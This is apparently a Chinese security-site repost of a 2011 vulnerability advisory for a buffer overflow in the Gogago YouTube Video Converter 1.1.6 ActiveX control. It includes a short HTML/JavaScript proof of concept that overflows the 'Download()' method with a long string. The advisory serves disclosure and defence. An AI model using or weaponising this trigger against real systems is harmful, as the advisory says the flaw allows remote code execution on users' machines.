首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gogago YouTube Video Converter 1.1.6 Buffer Overflow
来源:http://www.htbridge.ch/advisory 作者:htbridge 发布时间:2011-06-17  
Vulnerability ID: HTB23012
Reference: http://www.htbridge.ch/advisory/gogago_youtube_video_converter_activex_control_download_buffer_overflow_vulnerability.html
Product: Gogago YouTube Video Converter 
Vendor: Gogago ( http://www.gogago.net/ ) 
Vulnerable Version: 1.1.6 (3/29/2011) and probably prior
Tested on: 1.1.6 (3/29/2011)
Vendor Notification: 25 May 2011 
Vulnerability Type: Buffer Overflow
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered a buffer overflow vulnerability in Gogago YouTube Video Converter ActiveX control.

User-supplied data in "bsURL" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "Download()" method in MDIEEx.dll file.

Successfully exploiting the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application using the ActiveX control.

The following PoC code is available: 

<html>
<body>
<object classid='clsid:7966A32A-5783-4F0B-824C-09077C023080' id='target'></object>
<script language='javascript'>
var arg1 = '';
while (arg1.length < 2000) arg1+='A';
target.Download(arg1);
</script>
</body>
</html>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Explorer6 空指针访问
·MS11-050 IE mshtml!CObjectElem
·MS HyperV Persistent DoS Vulne
·Black Ice Cover Page SDK insec
·Conky Linux 1.8.0 Local DoS/Po
·Black Ice Fax Voice SDK v12.6
·Microsoft Office XP Remote cod
·DATAC RealWin SCADA Server 2 O
·Windows Media Player with K-Li
·XnView 1.98 Denial of Service
·Opera Web Browser 11.11 Remote
·DreamBox DM800 Arbitrary File
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved